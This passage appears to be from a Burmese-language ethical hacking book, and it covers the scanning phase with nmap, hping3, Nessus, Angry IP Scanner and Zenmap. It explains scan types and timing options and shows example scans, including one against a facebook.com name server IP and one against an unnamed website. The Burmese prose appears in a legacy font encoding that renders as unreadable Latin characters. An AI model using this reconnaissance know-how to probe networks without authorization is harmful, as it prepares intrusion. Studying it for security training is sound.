Linux Terminal rSmuawmh ydkjyD; jrefqefwmudk awGY&ygr,f/ Kali Linux

rSm yg0ifwJh scanning tool tawmfrsm;rsm;[m TCP, UDP & ICMP vdk protocol
awGudk toHk;csjyD; target networks awGudk map out jyKvkyfygw,f/ Scanning
Phase &JU successful result awGuawmh listing of hosts, IP addresses, OS &
services pwJh tcsuftvufawGudk &,lEdkifzdkYyJ jzpfygw,f/ tcsdKUaom tool awGqdk
Vulnerabilities eJY user details awGudkyg uncover vkyfEdkifygw,f/
xdktcsuftvufawGonf exploitation phase twGuf aumif;rGefaom
tcGifhtvrf;awGudk zefwD;ay;EdkifpGrf;ygw,f/ baMumifhvJqdkawmh exploitation
phase rSm vkyfaqmif&r,fh attack awG[m target &JU hosts, technologies eJY
vulnerabilities awGay: rlwnfjyD; vkyfaqmif&rSmjcif; uGJjym;wmaMumifh
jzpfygw,f/
NMAP (the King of Scanners)
Nmap rSm target network ay: run aewJh active uGefysLwmawGudk
od&SdEdkifwJh pGrf;&nfomru Operating System udk cGJjcm;Edkifwm? port listening,
services eJY jzpfEdkifacs&SdwJh user credentials awGudkyg determine jyKvkyfay;Edkifwm
aMumifh the King of Scanners vdkY wifpm;ac:qdkMuwm jzpfygw,f/ commands,
switches & options awGudk toHk;jyKjcif;tm;jzifh scanning phase rSm BuD;rm;pGm
pGrf;aqmifay;EdkifwJh tool wpfck vnf; jzpfaeygw,f/

Nmap Command Structure

Nmap command structure udk tMurf;zsif;tm;jzifh atmufygtwdkif;
azmfjyEdkifygw,f/

Nmap command structure udk txufyg yHkpHav;eJY tvG,fqHk;

jrifa,mifMunfhEdkifygw,f/ yxrqHk;oHk;xm;wmu nmap qdkwJh command yg/
command &JU t"dyÜg,fu rdrd b,f program udk toHk;jyKr,fqdkwmudk uGefysLwm
odatmif ac:jyjcif; jzpfygw,f/ 'kwd,uawmh options yg/ nmap u scanning
tool jzpfvdkY olU&JU options uvnf; scanning options aygh/ tJrSm toHk;jyKjyxm;wm
u -sS yg/ s tao;eJYtBuD;yg/ olu -sS/sT/sA/sW/sM: TCP
SYN/Connect()/ACK/Window/Maimon scans vdkY qdkvdkygw,f/ nmap &JU
scanning technique awGxJu stealth scan udk toHk;jyKr,fvdkY ajymvdkufwmyg/
wwd, -T2 u timing options yg/ ydkjrefatmifeJY ydkaES;atmifqdkjyD; 0 - 5
a&G;cs,fEdkifygw,f/ higher is faster yg/ IP address xnfhoGif;xm;wmuawmh
target a&G;cs,fwmyg/ aemufqHk; option uawmh output jzpfygw,f/ -oN u
output scan in normal vdkY qdkvdkygw,f/ tvG,fajym&&if &v'fudk
zdkifxkwfr,faygh/ aemufu scan.xml u &v'fudk scan qdkwJh emrnf wyfxm;wJh
xml zdkiftjzpf xkwfr,fvdkY qdkvdkygw,f/ emrnfudk rdrdESpfouf&m ay;Edkifygw,f/
location udkyg a&G;Edkifygao;w,f/ Oyrm- result udk Desktop ay:rSm xkwfvdkygu
scan.xml ae&mrSm Desktop/scan.xml aygh/

Timing rygbJeJYvnf; scan zwfEdkifovdk output rxm;bJeJYvnf; scan

jyKvkyfEdkifygw,f/

result xJurS open port awGudkvnf; tvG,fwul awGYjrifEdkifygw,f/

IP address r[kwfbJ website awGudkvnf; wdkuf&dkuf scan

Eddkifygao;w,f/

nmap udk default twdkif;yJ oHk;&if stealth scan tjzpf scan zwfygw,f/
option awGeJY toHk;jyKyHkawGudk Munfhcsif&ifawmh xHk;pHtwdkif;yJ manual
(#man nmap) eJY help option (#nmap -h <or> nmap --help) eJY Munfh&IEdkifygw,f/
-sS Stealth Scan
stealth scan -sS u nmap &JU default scan option jzpfw,fqdkwm azmfjy
cJhjyD;ygjyD/ olu target eJY ywfoufjyD; TCP connection wpfckudk
pwifvkyfaqmifEdkifygw,f 'gayr,fh three-ways handshake udkawmh jynfhpHkatmif
aqmif&GufEdkifjcif; r&Sdygbl;/

69.171.239.12 qdkwmu nslookup eJY &SmazG&,lxm;wJh facebook.com

&JU name server IP address jzpfygw,f/ information gathering ydkif;rSm
aqG;aEG;jyD;jyDaemf/ ck tay:yHkyg result t&Munfh&if TCP port 53 onf open state
rSm&SdaejyD; service u domain qdkwm od&SdEdkifygw,f/

-sT TCP Connect Scan

TCP connect scan u target host eJY TCP connection udk stealth scan
xuf ydkrdkjynfhpHkpGm scan EdkifaprSmjzpfygw,f/
-sU UDP scan
UDP scan target system ay:rSm&SdwJh UDP ports awGudk
uawmh
tuJjzwfay;ygw,f/ TCP port scan eJY rwlwmuawmh UDP scan onf
ydwfxm;wJh target system &JU reply udkyg vufcH &&Sdatmif aqmif&GufEdkifwm
aMumifhyg/

'guawmh website
wpfck&JU IP address udk erlem &Smjyxm;wm
jzpfygw,f/ UDP ports ESpfckawGY&rSmjzpfjyD; closed jzpfaewmudk awGY&rSmyg/

other IP address udk UDP scan jyKvkyfjyxm;wmjzpfygw,f/

-sA ACK scan

-sA eJY toHk;jyKwJh ACK scan udk TCP port wpfckck filtered or
unfiltered jzpfaewJhtcgrSm toHk;jyKygw,f/ ACK udkoHk;jyD; Target eJY initiate
vkyfovdk tcsdKUaom firewall awGudkawmifrS bypass jyKvkyfEdkifygw,f/ target xH
SYN packet awGudk ay;ydkYw,f/ target xHrS reset (RST) response jyefvm&ifawmh
'D scan [m port unfiltered jzpfaew,fqdkwmudk jyw,f/ response
jyefrvmvsifjzpfap? code 1,2,3,9,10 or 13 ESifhtwl ICMP response
(unreachable error) jyefvmygu port onf filtered jzpfaewmudk od&SdEdkifygw,f/
atmufyg yHkudk Munfhyg/
Timing Templates
normal scanning xuf ydkjrefatmif (odkYr[kwf) ydkaES;atmif jyKvkyfEdkif
apzdkY timing function udk toHk;jyKEdkifygw,f/ nmap &JU default timing u T3
(normal) jzpfygw,f/

-T5 udk erlem oHk;jycJhwmyg/ IP address uawmh metasploitable &JU IP

address udk toHk;jyKxm;ygw,f/

port awGudk a&G;cs,f scan vdkYvnf; &ygao;w,f/

-p 1-500 qdkwmu port 1 uae 500 xd twGif;yJ scan r,fvdkY

qdkvdkygw,f/ result awGrSm b,fvdk jrif&r,fqdkwmawmh rdrdwdkYbmom prf;oyf
Munfhapvdkygw,f/

T0 to T5 (summary)
T0 udk paranoid vdkY ac:ygw,f/ ydkjyD; xda&mufrI&Sdayr,fh tcsdefawG
t&rf; MumjrifhrSmjzpfvdkY stealth vdktyfwJhtcgrSmjzpfap? tcsdefat;at;aq;aq;
&wJhtajctaerSmjzpfap toHk;jyKEdkifygw,f/
 -T0 or --timing paranoid vdkY toHk;jyKEdkifygw,f/ tay:rSm ESpfrsdK;vHk;
erlem jyxm;ygw,fAs/ prf;MunfhMuyg/ xl;jcm;rIawGudk apmifhMunfhyg/ rSwfom;yg/
ydkjyD; uGJjym;pGm awGYjrifvm&ygvdrfhr,f/ tcsdefawmh ay;&r,f/ pdwf&Snf&r,fAs/

T1 udkawmh sneaky vdkY ac:ygw,f/ T0 xuf ydkjyD; jrefygw,f/ -T1

yJoHk;jyD; toHk;jyKEdkifygw,f/

T1
jyD;awmh T2 aygh/ T1 xuf ydkjrefygw,f/ T2 udk polite vdkY
ac:Muygw,f/

T3 uawmh default twdkif;yJrdkY T3 vdkY xnfhr&dkufbJudk &ygw,f/ T3

emrnfu normal yg/
T4 uawmh aggressive jzpfjyD; ydkjrefvmygw,f/ T5 uawmh
tjrefqHk;jzpfjyD; Insane vdkY ac:ygw,f/ T0, T1, T2, T3, T4, T5 tm;vHk;udk wpfckpD
toHk;jyKjyD; target wpfckudk 6rsdK;vHk; vufawGYprf;oyfMunfhyg/ uGmjcm;rIawGudk
rSwfxm;yg/ aemif bmvdk&if bmudkoHk;&rvJqdkwm rSwfrdatmifaygh/

Targeting for Nmap

Nmap twGuf target onfIP address (or) web wpfckck
jzpfaeEdkifygw,f/ 'Dae&mrSmawmh IP address target udk qdkvdkygw,f/
yxrqHk;taeeJY IP address Ranges awGudk scan jyKvkyfjcif;udk aqG;aEG;ygr,f/
'DtaMumif; raqG;aEG;rD IP address class av; tenf;i,fudk aqG;aEG;vdkygw,f/
IP address class awGtaMumif; odzl; Mum;zl;jyD;om; jzpfwmrdkY 'Dae&mrSm wpfckpDudk
cGJjcm;jyraeawmhygbl;/
 IP class awGudk cGJjyxm;wJh table udk Munfh&if tvG,fodEdkifygw,f/
Oyrm uRefawmfwdkY&JU target IP onf 192.168.165.128 qdkygpdkY/ txufyg
Z,m;uGufrSm Munfh&if 192.168 onf class C xJrSm yg0ifaewmudk awGY&rSmyg/
aemufqHk; tvTm&JU tqHk;owfudk Munfh&if 255 jzpfwmaMumifh 192.168.165.0
uae 192.168.165.255 twGif;onf target IP ranges jzpfEdkifygw,f/ uJ vufawGY
vkyfMunfh&atmif/ IP address ae&mrSm rdrd IP address udk wGufjyD;
xnfhoGif;Munfhaygh/ pvdkuf&atmif/

resultawGuawmh trsm;BuD; xGufvmrSmjzpfygw,f/ rdrdwdkYbmom

prf;oyf Munfhapvdkygw,f/ tvm;wl tajzudk xkwfay;EdkifzdkYtwGuf CIDR
addressing udkvnf; toHk;jyKEdkifygw,f/

/24 udk xnfhoHk;&HkygyJ/ 'Dae&mrSm Timing xnfhrxm;bl;aemf/ tajz&JU

uGmjcm;rIawGudk owdjyK rSwfom;xm;zdkY rarhygeJY/
range udk ydkjyD; usOf;usOf;owfrSwfcsif&ifawmh atmufyg yHkpHudk
oHk;Edkifygw,f/
Scan List
Nmap eJY scan zwf&mrSm target IP address awGudk list vkyfxm;jyD;vnf;
zwfcdkif;Edkifygao;w,f/ IP list udkawmh txt zdkifeJY zefwD;&rSmjzpfygw,f/

lseJY list vkyfxm;wJh yHkt& uRefawmfh&JU Desktop ay:rSm IP address

awGudk pka&;xm;wJh IP list wpfck &Sdaeygw,f/ IP-list.txt qdkwJh zdkifeJYyg/

IP address awGudk xnfha&;xm;wJh IP-list.txt zdkifudk gedit eJY

zGifhjyxm;wmyg/ nmap command eJY scan &atmif/

command u&dk;&Sif;ygw,f/ -iL (insert List) List zdkifudk xnfhoHk;r,f

qdkwmudk azmfjywmaygh/ aemufu zdkifemrnfu rdrd ESpfouf&mudk ay;Edkifygw,f/
Oyrm targets.txt ponfjzifhaygh/ rdrdbmom IP list uav;wpfck aqmufjyD;
prf;oyfMunfhygOD;/

Selecting Ports
port awGudka&G;cs,f scan zwfwJhtaMumif; aqG;aEG;cJhygw,f/ 'gaMumifh
'Dae&mrSm trsm;BuD; xnfh raqG;aEG;awmhygbl;/ olYudk atmufyg yHkpHrsdK;awGeJY
oHk;Edkifygw,f/
 -p 1-100 u port 1 uae 100 xdtwGif; zwfr,f/ -p 1,21,... ponfjzifh
('kwd,yHk)uawmh a&G;cs,fjyxm;wJh port awGudkyJ scan r,faygh/ aemufqHk;wpfck
-p 1-100,137,161,162 uawmh port 1 uae 100 tjyif 100 ausmfwJhxJuqdk
137,161,162 udkyg xnfhzwfr,fvdkY qdkvdkjcif; jzpfygw,f/ txufyg oHk;rsdK;xJu
a&G;cs,foHk;Edkifygw,f/ eHygwfawGuawmh Oyrm ay;jcif;oufoufom/

Output Options
a&SUrSmvnf; output option taMumif; enf;enf;av; ajymjyD;ygjyD/
ckawmh options av;cktaMumif;udk wpfckpD aqG;aEG;&atmif/ yxrqHk; -oN u
normal output yg/ other program awGrSm result jyef,loHk;EdkifzdkY output file taeeJY
odrf;qnf;Edkifygw,f/ Oyrm - test vdkY emrnfeJY odrf;r,fqdkygawmh/

-oX uawmh Extensible Markup Language (xml) output yg/

-oG uawmh GREPable Output jzpfjyD; GREP vdk tool awGudk

toHk;jyKjyD; xyfrH pHkprf;axmufvSrf;EdkifzdkYtwGuf Penetration Tester awGu
toHk;jyKMuygw,f/

-oS uawmh ScRipT Kidd\# oUTpuT jzpfygw,f/ 'D script kiddie

output udk serius scans awGrSm roHk;oifhygbl;/

HPING3
Hping qdkwm manually craft packets awGudk network ay:rSm
xm;&SdEdkifzdkYtwGuf toHk;jyKwJh application wpfck jzpfygw,f/ 'D manual precess
[m nmap engine u packet awGudk tvdktavsmuf zefwD;yHkrsdK;eJY qifwlygw,f/
Hping3 udk -S flag eJY wGJoHk;avh&Sdygw,f/

rdrdbmom vkyfaqmifMunfhEdkifygw,f/ &yfwefYvdkygu terminal

ydwfíjzpfap? control+c udk ESdyfjyD;jzpfap &yfwefYEdkifygw,f/
Nessus
'Dcgawmh nessus scanner taMumif;av; qufvuf aqG;aEG;ygr,f/

txufyg yHktwdkif; version oHk;rsdK;jzifh xkwfxm;wJh nessus scanner [m

Pro & Manager Version awGrSmqdk tvGef aps;BuD;vSw,fvdkY qdk&rSmjzpfygw,f/
wpfESpfvsif a':vm ESpfaxmifausmfrdkY omref toHk;jyKolawGuawmh free version
udkom tm;xm;toHk;jyKMu&ygw,f/ (rjzpfrae vdkufvkyfMunfhp&mrvdkbl;aemf)

nessus scanner udk a'gif;,lvdkygu Browser's address bar rSm

bit.ly/nessus-kmn vdkY &dkufxnfhjyD; enter vdkufEdkifygw,f/

txufyg address twdkif; oGm;ygu nessus scanner twGuf a&G;cs,f&ef

ae&mudk a&muf&SdrSmjzpfjyD; Windows, Mac OS, Linux, FreeBSD eJY GPG Keys
qdkjyD; a&G;cs,fEdkifrSmjzpfygw,f/ uRefawmfuawmh Kali Linux udk toHk;jyKrSmrdkY
Linux udk a&G;cs,fvdkufygw,f/ pm&Iolu Windows awGtwGuf &,lvdkYvnf;
&ygw,f/

uRefawmfu Kali Linux twGuf erlem jyrSmrdkY tjcm;[mawGudk

rajymawmhbl;aemf/ txufyg yHkrSmMunfhyg/ Linux udk a&G;cs,f click vdkufwmeJY
txufygyHktwdkif; ay:vmrSmjzpfjyD; rdrdwdkY toHk;jyKr,fh Linux trsdK;tpm;tvdkuf
a&G;cs,fp&m awGY&ygr,f/ tay:qHk;rSm Kali Linux AMD64 qdkwmeJY
'kwd,ae&mrSm i386(32-bit) qdkwmudk awGY&ygr,f/ rdrdwdkY&JU OS tvdkuf
a'gif;,lEdkifygw,f/ uRefawmfuawmh Kali Linux 4bit eJY erlemjyygr,f/

&Sm&vG,fatmif a'gif;xm;wJh nessus file udk Desktop ay:

a&TUxm;vdkufygw,f/ cd Desktop eJY 0ifjyD; ls xkwfMunfhwJhtcg
Nessus-6.11.1-debian6_amd64.deb qdkwJh teDa&mif Debian package udk
Terminal rSm jrifawGY&ygr,f/ Debian Package awGudk install enf; Linux
Chapter rSmuwnf;u ajymjyxm;jyD;om;yg/ 'Dae&mrSm wpfBudrf ajymjyygOD;r,f/

Debian Package rdkY dpkg yg/ install u -i jzpfjyD; aemufu

Nessus-6.11.1-debian6_amd64.deb uawmh package name yg/ package name
udk rrSm;atmif aumfyD,lxnfhvnf; &ygw,f (rdrda'gif;xm;wJh emrnftwdkif;
xnfh&rSmyg)/ jyD;&ifawmh enter aygh/ command line aemufwpfck ay:vm&ifawmh
install finish jyD jzpfygw,f/
 Terminal rSm /etc/init.d/nessusd start vdkY &dkufjyD; enter vdkuf&if
txufygyHktwdkif; Starting Nessus : . qdkjyD; awGY&ygr,f/ Browser udk oGm;yg/
jyD;&if Browser's Address Bar rSm https://localhost:8834 vdkY &dkufxnfhjyD; enter
yg/

txufygtwdkif; address udk enter vdkufygu

'Dvdk awGY&ygr,f/ Advanced qdkwJhae&mudk oGm;yg/

jyD;&if Add Exception.. qdkwmudk click vdkufyg/

 confirm security exception udk xyfESdyfvdkufyg/

txufygyHktwdkif; Nessus \ Welcome screen udk a&muf&SdoGm;rSm

jzpfygw,f/ continue aygh/ user name eJY passwords udk rdrdtqifajy&mxnfhjyD;
a&SUqufyg/

txufygtqifha&muf&ifawmh Registering the scanner link uae

register oGm;vkyfEdkifygjyD/ tpdrf;a&mif Link uav;eJY jrif&rSmyg/ oGm;vdkufyg/
jyD;&if tenable.io free for 60 days odkYr[kwf Free rSmyJ register vkyfvdkufyg/
oifhxHodkY mail wpfapmif 0ifvmrSmjzpfjyD; your activation code for the Nessus
Home is qdkjyD; uk'fudk awGY&ygr,f/ aumfyD,lxnfhvdkufyg/
 jyD;wJhtcgrSmawmh Setup complete jzpfjyD; installing jyKvkyfaewmudk
awGY&rSmjzpfygw,f/ a'gif;aewmjzpfvdkY tifwmeufvdkif; vdktyfygao;w,f/
ajymzdkY arhaewmav;wpfck ajymyg&ap/ Nessus udk toHk;jyKzdkYtwGuf Hardware
Needed taMumif;yg/ Nessus udk toHk;jyKzdkYtwGuf bmawGvkdtyfrvJqdk&ifawmh
 tenf;qHk; vdktyfcsufyg/ Security vkyfief;wpfcktaeeJY oD;oefY
vkyfaqmifr,fqdk&ifawmh vdktyfcsuf ydkrsm;Edkifygvdrhfr,f/ Software & Hardware
needed udk tao;pdwf odvdkygu bit.ly/nessus-req rSm oGm;a&muf
Munfh&IEdkifygw,fcifAsm/

txufyg Browser awGuyJ Nessus udk support vkyfEdkifwmrdkY Browser

uvnf; ta&;ygvSygw,f/

tcsdefawmfawmfMum install jyD;oGm;wJhtcgrSmawmh tapmydkif;u

username eJY Passwords udk oHk;jyD; 0ifa&mufEdkifjyDjzpfygw,f/ Sign In
0ifjyD;wJhtcg My scans, All scans, Plug in rules & Scanners awGudk
a&G;cs,fp&mtjzpf awGY&ygr,f/ create new scan qdkwJh pmaMumif;av;vnf;
jrifae&ygr,f/ pwif scan vdkY &ygjyD/
 scanner awGudk Munfhr,fqdk&if Free version rSm &EdkifwmawGeJY
upgrade version awGrSmrS &EdkifwmawGudk cGJjcm;jrifEdkifygw,f/ yxrqHk;jzpfwJh
Advanced Scan av;eJYyJ p Munfhvdkuf&atmif/

Settings
rSm tqifajy&mjznfh Plugins awGjznfhjyD; save vdkufygu Scan
vkyf&eftajctaewpfck toifh jyKvkyfjyD; jzpfygjyD/
 nmbuftpGefrSm&SdwJh > oauFwav;udk ESdyfjyD; launch vkyfygu
a&G;cs,fxm;cJhwmawGudk scan pwifwmudk awGY&ygr,f/ scan vkyfwmu udk,fh
target awGay:rlwnfjyD; tcsdefMumygr,f/

scanning jyD;oGm;wJhtcg IP wpfckcsif;pDtvdkuf result awGudk ckvdk

xkwfjyrSmjzpfygw,f/ Hosts qdkwJh ab;rSm Vulnerabilities qdkjyD; jyxm;wmuawmh
vuf&Sd pepfrSm jzpfay:aewJh tm;enf;csuf (,dkayguf)awGyg/ Vulnerabilities
ae&mudk ESdyfjyD; 0ifMunfhvdkuf&if tao;pdwf ydkjrif&ygr,f/ tpdrf;eJY tjyma&mif
jyxm;wmawGu bmrSrjzpfayr,fh t0g? vdar®mf? teDa&mifawGuawmh
raumif;ygbl;/ teDa&mifu tqdk;qHk;jzpfjyD; 'kwd,tqdk;qHk;u vdar®mfa&mifyg/
t0ga&mifuawmh qdk;wJhtxJrSm awmfao;w,fajym&ygr,f/

rdrdbmom vkyfaqmifMunfh&if ydkjyD; em;vnfvmr,fvdkY ,lqygw,f/

Vulnerability wpfckcsif;pDudk ESdyfzGifhMunfhjcif;tm;jzifh b,fvdk vulnerability qdkwm?
b,fvdk vkyfoifhw,qdkwm pwmawGudk tBuHjyKazmfjyxm;awGudk awGYjrif&ygr,f/

nmbuftpGefrSm&SdwJh Export uaevnf; pdf, nessus, html, csv, nessus

DB file awGtaeeJY Save jyD; odrf;xm;Edkifygao;w,f/ 'D CHAPTER u
Scanning Phase taMumif; aqG;aEG;jcif; jzpfygw,f/ vufawGY vkyfaqmifp&mawG
yg azmfjycJhjyD;jyDaemf/
 'Dtcef;rSm yHkpHwpfrsdK;ajymif;jyD; aqG;aEG;Munfhwmyg/ vkyfaqmif&rSm
awGudk wpfckpD &Sif;jyjyD;cJhjyDjzpfvdkY tawmftoifh em;vnf od&Sdavmuf
jyDvdkY ,lqygw,f/ uRefawmf 'Dtcef;rSm yHkrSefeJY qefYusifjyD; yHkpHwpfrsdK;eJY
aqG;aEG;csifwmrdkY yxrqHk; aqG;aEG;&r,fhtydkif;awGudk ck qufaqG;aEG;ygawmhr,f/
txufyg aqG;aEG;csufawGudk t&ifqHk; vkyfaqmifMuyg/ jyD;qHk;jyDqdkrS ,ck
qufaqG;aEG;r,fhtydkif;udk qufzwfapvdkygw,f/

Types of Scanning
uRefawmfwdkYtaeeJY hacking &JU phase 2 onf Scanning
jzpfw,fqdkwmudk od&SdjyD;ygjyD/ vufawGYvkyfaqmifcJh&mrSm uRefawmfwdkYtaeeJY
owdxm;rdEdkifwm&Sdygw,f/ tJ'guawmh network eJY port qdkjyD; jzpfygw,f/
tJonfawmh uRefawmfwdkYawG scan zwfw,fajymMuw,f/ bmawGudk scan vJvdkY
ar;&if cGJjcm;ajzp&m tajz ESpfck &Sdygw,f/ tJ'gu types of scanning ygyJ/
Scanning jyKvkyfwJhae&mrSm Network Scanning eJY Port Scanning qdkjyD; yHkpH ESpfrsdK;
cGJjyD; jrifMunfhEdkifygw,f/ wpfckcsiff;pD azmfjyaqG;aEG;oGm;ygr,f/
hacker wpfa,muftaeeJY network system wpfckudk
xGif;azmuf0ifa&mufEdkifzdkY BudK;pm;w,fqdkygpdkY/ private network xJrSm b,f
system & service awG run aew,fqdkwmawG? IP address awG? toHk;jyKaewJh OS
awG pwJh tajccHtcsuftvufawG r&SdygbJvsufawmh b,fvdk information
rsdK;ukdrQ hack ,lEdkifrSmr[kwfygbl;/
'DtajctaerSm scanning &JU tcef;u@u ta&;ygvmygawmhw,f/
scanning jyKvkyfrIay: rlwnfjyD; network scanning eJY port scanning vdkY
cGJjcm;owfrSwfEdkifayr,fh ESpfckvHk;onf ta&;ygwJhtydkif;awGcsnf;om jzpfygw,f/

Network Scanning
Scanning vkyf&mrSm Network Scanning & Port Scanning qdkjyD; ESpfrsdK;
&SdwJhteuf yxrwpfcku Network Scanning yg/ network scanning vdkY jcHKiHkajym
ayr,fh trsm;pku private network scanning udkom vkyfaqmifMuygw,f/
technique trsm;pkudk internally scan jyKvkyfEdkifzdkYtwGuf zefwD;xm;wmjzpfjyD;
tenf;pkuomvsif public network awGudkyg scan vkyfEdkifum reliable result udk
&&SdEdkifygw,f/
aumif;jyD/ 'gqdk hacker awGu uRefawmfwdkY&JU internal network awGudk
b,fvdk scan MuygovJ/ xdk tenf;i,faom tool awGudk toHk;jyKjyD; uRefawmfwdkY
&JU public IP address awGudk scan Muygw,f/ jyD;awmh uRefawmfwdkY&JU umuG,fa&;
(defenses) pepfawGudk ausmfjzwfEdkifapzdkYtwGuf tm;enf;csufawGudk
&SmazGygw,f/
txufrSmvnf;yJ scan jyKvkyfenf;awGudk aqG;aEG;cJhygw,f/ ckawmh
tay:rSm raqG;aEG;&ao;wJh scanning tool wpfckeJY qufvuf jznfhpGuf
aqG;aEG;&atmif/ bm tool vJqdkawmh ICMP udk toHk;jyKxm;wJh Angry IP
Scanner yg/ angryip.org/download vdkY Browser rSm&dkufxnfhjyD;
a'gif;,lEdkifygw,f/ oluawmh Linux, Mac, Windows awGrSm toHk;jyKEdkifygw,f/
cke vdyfpmuae oGm;wJhtcg windows, Mac & Linux qdkjyD; a&G;p&m
oHk;ckxJurS uRefawmfuawmh Kali Linux udk toHk;jyKrSmjzpfvdkY Linux udkyJ
a&G;cs,fvdkufygw,f/

a&G;cs,fvdkufwJhtcg txufygyHktwdkif; awGYjrif&rSmjzpfjyD;awmh

uRefawmfu Kali Linux udk oHk;rSmjzpfvdkY Kali onf Debian Based jzpfwmaMumifh
DEB Package qdkwmxJu a&G;&ygr,f/ 32 or 64 bit rdrdwdkY&JU OS twdkif; a&G;cs,f
a'gif;,lEdkifygw,f/ &vmjyDqdkygawmh/ uRefawmf a'gif;vdkufwJh zdkifu
ipscan_3.5.1_amd64.deb jzpfwmaMumifh dpkg -i ipscan_3.5.1_amd64.deb qdkjyD;
xnfhoGif;&ygr,f/ install awmh vkyfwwfjyDvdkY ,lqvdkY yHkawG xnfhrjyawmhygbl;/
 zGifhMunfhr,fqdk&ifawmh txufyg yHktwdkif; jrifawGY&rSmyg/

erlemtaeeJY omreftwdkif;yJ scan jyxm;wmyg/ IP address udk

172.16.3.1 uae 172.16.3.100 twGif; zwfMunfhwJhtcg Hosts alive 1 qqdkjyD;
alive jzpfaewJh host wpfck &SdaMumif; azmfjyygw,f/

&vmwJh result (lists) xJrSm oGm;zGifhMunfh&ifvnf; txufygtwdkif;

jrifawGY7rSmyg/ rdrdbmom vkyfaqmifMunfh&if ydkjyD; uGJjym;pGm jrif&ygr,f/
 txufygyHkuawmh website wpfck&JU IP address udk scan zwfjyxm;wm
jzpfygw,f/ Hostname udk copy ,ljyD; Browser uae wpfqifh
oGm;wJhtcgrSmawmh atmufygtwdkif; Login Page udk a&muf&SdoGm;ygw,f/

b,f site vJqdkwmudkawmh azmfrjyawmhygbl;As/

Port Scanning
Network service & program trsm;pkonf rnfonfh protocol udk
toHk;jyKaeonfudk oifodygovm;vdkY ar;&if tajzu TCP/IP vdkY ajz&ygvdrfhr,f/
TCP/IP network protocol udk US Department of Defense u 1970 rSm pwif
jyKvkyfcJhwmjzpfygw,f/ ,ck 2017 xdqdk 47ESpf0ef;usif &SdcJhygjyD/ aemufydkif;
enf;ynmawG xyfrH ay:aygufcJhayr,fh vltrsm;pkuawmh ,aeYxd qufvuf
toHk;jyKaeqJygyJ/
Service awGonf port awGuaewpfqifh listen jyKvkyfygw,f/ client
onf service eJY contact jyKvkyfEdkifjyD; connection wpfck wnfaqmufEdkifygw,f/
&nf&G,fcsufuawmh information awGudk transfer jyKvkyfEdkifapzdkYeJY services awGudk
request jyKvkyfEdkifapzdkYyg/
Server wpfckay:rSm run aewJh port awGudk scan jyKvkyfwJhtcg port
awGu response jyefay;ygw,f/ 'g[m xdk port onf open jzpfaew,fqdkwmudk
azmfnTef;jyD; xdkay:rSm service uae listening jyKvkyfEdkifygw,f/
Port awGonf software abstraction wpfckjzpfjyD; communication
channel awGMum;rSm cGJjcm;ay;EdkifzdkYtwGuf toHk;jyKEdkifygw,f/ single machine rSm
toHk;jyKaewJh specific application awGudk port awGu identify jyKvkyfEdkifygw,f/
'gaMumifh port scanning qdkwm[m port awG&JU current status udk od&SdEdkifzdkYtwGuf
ta0;uae test jyKvkyfEdkif&ef vkyfaqmifwJh action awGudk ac:qdkaMumif; rSwf,l
xm;Edkifygw,f/
'guawmh uRefawmfwdkYtaeeJY tusOf;csKyf aqG;aEG;cJhjcif;om jzpfygw,f/
uRefawmfwdkYrSm IP address awGeJY port awG &SdaeMuygw,f/ olwdkYudk
b,fvdkoHk;EdkifrvJ aqG;aEG;&atmif/
network wpfckay:rSm &SdaewJh machine awGudk &SmazGod&SdEdkifapzdkY IP
address awGudk toHk;jyKEdkifygw,f/ single machine wpfckcsif;pDrSm &SdaewJh
particular application awGudk &SmazGzdkYtwGufawmh port awGudk toHk;jyK&ygw,f/
vlodrsm;wJh port ESpfckavmufeJY erlem aqG;aEG;ygr,f/
HTTP URL awGudk toHk;jyKwJhtcgrSm uRefawmfwdkY&JU Browser onf
TCP port 80 udk default taeeJY csdwfqufygw,f/ tu,fírsm; HTTPS
protocol udk toHk;jyKr,fqdk&ifawmh Browser [m port 443 udk default taeeJY
csdwfqufzdkY BudK;pm;rSmjzpfygw,f/ 'Dtydkif;udk tao;pdwf &Sif;jyygu
pmtkyfwpf0ufpmavmuf &Snfvsm;oGm;EdkifwmrdkY 'Dae&mav;rSmyJ &yfyg&ap/
Zenmap (The GUI Version of Nmap)
Zenmap qdkwmuawmh nmap udk command line uae r[kwfbJ GUI
version taeeJYyg toHk;jyKEdkifatmif zefwD;xm;wJh application wpfckyg/ nmap eJY
vkyfaqmifyHkcsif; wlwlygyJ/ toGiftjyifom rwlwmjzpfjyD; Zenmap udk Windows
rSmvnf; toHk;jyKvdkY &ygw,f/ nmap.org/download.html uae oGm;a&muf
a'gif;,l &&SdEdkifygw,f/

Windows twGufawmh txufyHkyg link uae aemufqHk; upgrade

version.exe udk a'gif;,lEdkifrSmjzpfygw,f/ Version uGmjcm;rI&SdEdkifygw,f/ ck
jyxm;wmuawmh 2017, October 8 &ufaeYxd &Sdaeao;wJh version jzpfygw,f/
uRefawmfwdkY toHk;jyKr,fh Kali Linux rSmawmh Zenmap (build-in)
taeeJY yg0ifjyD; jzpfygw,f/ a'gif;p&mrvdkygcifAs/

Zenmap udk zGifhvdkufwJhtcg txufygtwdkif; jrifawGY&ygr,f/ Target

ae&mrSm IP address (in any range) udk xnfhoHk;EdkifwmjzpfjyD; atmufrSm&SdwJh
command qdkwJhae&mrSm nmap terminal command awGudkvnf;
xnfhoHk;Edkifygao;w,f/ tay:rSm rdrdbmom a&G;cs,fEdkifzdkY Profile qdkwmwpfck
&Sdao;jyD; tJonfae&muaevnf; scan type udk a&G;cs,fowfrSwfEdkifygw,f/
command &JU atmufbufrSmawmh Hosts, Services qdkwJh options
ESpfckudk xyfawGY&rSmjzpfjyD; result taeeJYawmh Nmap Output, Ports/Hosts,
Topology, Host Details, Scans qdkjyD; awGYjrif&rSmyg/ nmap taMumif;vnf; &Sif;jy
xm;jyD;om;jzpfvdkY vufawGY vkyfaqmifMunfhjcif;tm;jzifh ydkrdk od&Sd em;vnfEdkifaprSm
jzpfygw,fcifAsm/ uRefawmfuawmh Nmap udkyJ ydkjyD; toHk;jyKapcsifygw,fcifAsm/
 txufygyHkuawmh Zenmap &JU Profile rSm Scan Type awG
a&G;cs,fEdkifwmawGudk azmfjyxm;wmyg/ wpfckcsif;pDudk prf;oyfMunfhjcif;? nmap
command rsm;ESifh EIdif;,SOfMunfhjcif;tm;jzifh rdrdwdkYbmom ydkrdkem;vnfvmjyD;
b,f[mudk ydkoHk;oifhw,fqdkwmyg od&SdvmrSmyg/
aemufxyf CHAPTER av;wpfckudk qufoGm;&atmifcifAsm/
CHAPTER 10: Exploitation

Introduction to Exploitation

